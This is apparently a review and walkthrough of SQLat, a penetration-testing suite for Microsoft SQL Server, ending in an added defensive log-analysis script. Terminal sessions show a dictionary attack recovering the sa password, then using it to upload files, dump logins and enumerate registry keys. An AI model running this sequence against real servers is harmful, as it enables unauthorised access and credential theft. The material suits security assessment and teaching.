The Web Local
SQL Auditing Tools (SQLat)

SQLat is a useful suite of tools that come in handy when carrying out a vulnerability assessment or penetration test against a Microsoft SQL Server.

SQLat encompasses the following tools:

  • sqlanlz - Enumerates information about databases, users, extended stored procedures etc., outputting an HTML report.
  • sqldict - Carries out a dictionary-based attack against the user(s) specified.
  • sqldirtree - Outputs an ASCII directory tree of the base directory specified.
  • sqldumplogins - Dumps all user accounts from the MS SQL Server.
  • sqlquery - Interactive query tool.
  • sqlregenumkey - Enumerates registry keys.
  • sqlreggetvalue - Enumerates the values of a specific registry key.
  • sqlsamdump - Attempts to dump the SAM from a SQL Server using pwdump2.
  • sqlupload - Attempts to upload files to a MS SQL Server.

Note: the tool temporarily restores xp_cmdshell if it has been removed but its DLL is still left on the system, and valid credentials are required for a number of the tools above to work correctly.

SQLat is based on the FreeTDS library and, as of version 1.0.6, supports NTLM integrated login. It does not yet support named pipes.

Installation:

SQLat has a number of prerequisites:

FreeTDS needs to be installed first, with the usual procedure for a tar.gz file:

./configure
make
make install

pwdump2 needs to be unzipped to an appropriate directory.

To install SQLat, use the following commands, passing at least the --with-tdsver parameter shown:

./configure --with-tdsver=7.0
make
make install

It is available from here.

Execution and expected output:

[root@hacker bin]# ./sqldict
SQLDict v1.1.0 by patrik@cqure.net
----------------------------------
usage: ./sqldict [options]
-i* <ip|ipfile> to probe
-t port (default 1433)
-u* <userfile>
-p* <dicfile>
-r <reportfile>
-v verbose

[root@hacker bin]# ./sqldict -i 192.168.1.175 -u user.txt -p password.txt
IP: 192.168.1.175 User: sa Pass: password

The dictionary attack trivially recovered the sa password: "password".
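Added example, not part of the original review or of SQLat: a small Python check, written from the defender's side, that reads SQL Server ERRORLOG lines for the burst of failed logins a dictionary run such as the sqldict one above leaves behind, and records whether a successful login for the same account from the same client followed. It assumes the SQL Server 2005+ log format with a "[CLIENT: ip]" suffix (7.0/2000 logs omit the client), and the log excerpt is constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt (sample data, not output from the page's target).
# The "[CLIENT: ip]" suffix is the SQL Server 2005+ format; 7.0/2000 logs omit it.
SAMPLE_ERRORLOG = """\
2004-05-12 10:15:23.40 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.50]
2004-05-12 10:15:23.52 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.50]
2004-05-12 10:15:23.63 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.50]
2004-05-12 10:15:23.75 spid51      Starting up database 'tempdb'.
2004-05-12 10:15:23.86 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.50]
2004-05-12 10:15:23.97 Logon       Login failed for user 'sa'. [CLIENT: 192.168.1.50]
2004-05-12 10:15:24.09 Logon       Login succeeded for user 'sa'. Connection: Non-Trusted. [CLIENT: 192.168.1.50]
2004-05-12 11:02:00.00 Logon       Login failed for user 'reports'. [CLIENT: 10.0.0.7]
"""

LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']*)'.*?"
    r"(?:\[CLIENT: (?P<client>[^\]]+)\])?\s*$")

def parse_logon_events(log_text):
    """Return (timestamp, result, user, client) for each Logon line; other lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LOGON_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group("result"), m.group("user"), m.group("client") or "unknown"))
    return events

def find_dictionary_attacks(events, threshold=5, window=timedelta(seconds=60)):
    """Flag each (client, user) pair with at least `threshold` failures inside `window`,
    and record whether a success from that client for that user followed the burst
    (the trace left when the dictionary contained the password)."""
    by_pair = defaultdict(list)
    for ts, result, user, client in events:
        by_pair[(client, user)].append((ts, result))
    alerts = []
    for (client, user), hits in by_pair.items():
        hits.sort()
        failures = [ts for ts, r in hits if r == "failed"]
        for i in range(len(failures) - threshold + 1):
            if failures[i + threshold - 1] - failures[i] <= window:
                last_fail = failures[i + threshold - 1]
                guessed = any(r == "succeeded" and ts > last_fail for ts, r in hits)
                alerts.append({"client": client, "user": user,
                               "failures": len(failures), "password_guessed": guessed})
                break  # one alert per pair is enough
    return alerts
```

Running find_dictionary_attacks(parse_logon_events(SAMPLE_ERRORLOG)) on the sample flags the sa burst from 192.168.1.50 with password_guessed set, while the single failure for 'reports' stays below the threshold.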

 

[root@hacker bin]# ./sqlquery
SQLExec v1.1.0 by <patrik@cqure.net>
------------------------------------
./sqlquery [options]
-i* <ipaddress>
-t port (default 1433)
-q <query> (if ommited execute interactive mode)
-u username
-p password

[root@hacker bin]# ./sqlquery -i 192.168.1.175 -u sa -p password -q "select @@version"
SQLExec v1.1.0 by <patrik@cqure.net>
------------------------------------------
Microsoft SQL Server 7.00 - 7.00.623 (Intel X86)
Nov 27 1998 22:20:07
Copyright (c) 1988-1998 Microsoft Corporation
Standard Edition on Windows NT 4.0 (Build 1381: Service Pack 6)

Passes a SQL query to the server to determine the database version; in this example we use the sa credentials recovered earlier.

[root@hacker bin]# ./sqlupload
SQLUPLOAD v1.1.0 by patrik@cqure.net
------------------------------------
usage: ./sqlupload [options]
-i* <ipaddress> to probe
-t port (default 1433)
-f* <filename> to upload
-u username
-p password
-T path to tempdir if not autodetected
-h this
-v verbose

[root@hacker bin]# ./sqlupload -i 192.168.1.175 -u sa -p password -f user.txt -v
SQLUpload by Patrik Karlsson <patrik@cqure.net>
-- Logging in to 192.168.1.175 --
-- Searching for temp path --
Your file will be in c:\temp
-- Uploading user.txt --

A file upload using the sa credentials, which succeeds and places the file in the server's temp directory.

[root@hacker bin]# ./sqldumplogins
SQLDumpLogins v1.1.0 by <patrik@cqure.net>
------------------------------------------
./sqldumplogins [options]
-i* <ipaddress>
-t port (default 1433)
-u username
-p password

[root@hacker bin]# ./sqldumplogins -i 192.168.1.175 -u sa -p password
SQLDumpLogins v1.1.0 by <patrik@cqure.net>
------------------------------------------
Administrator
sa

Enumerates all logins on the remote machine using the privileges gained previously.

[root@hacker bin]# ./sqlregenumkey
./sqlregenumkey: option requires an argument -- k
SQLRegEnum v1.1.0 by <patrik@cqure.net>
---------------------------------------
./sqlregenumkey [options]
-i* <ipaddress>
-t port (default 1433)
-k <key> (default HKLM\SW\MS\Win\CurrVer\Run)
-u <username>
-p <password>

[root@hacker bin]# ./sqlregenumkey -i 192.168.1.175 -u sa -p password -k
SQLRegEnum v1.1.0 by <patrik@cqure.net>
------------------------------------------
SystemTray=SysTray.Exe
BrowserWebCheck=loadwc.exe
SchedulingAgent=mstinit.exe /logon
VMware Tools=C:\Program Files\VMware\VMware Tools\VMwareTray.exe
VMware User Process=C:\Program Files\VMware\VMware Tools\VMwareUser.exe

Enumerates the programs run at system start-up (the default Run key); in this case the target is clearly a VMware virtual machine.
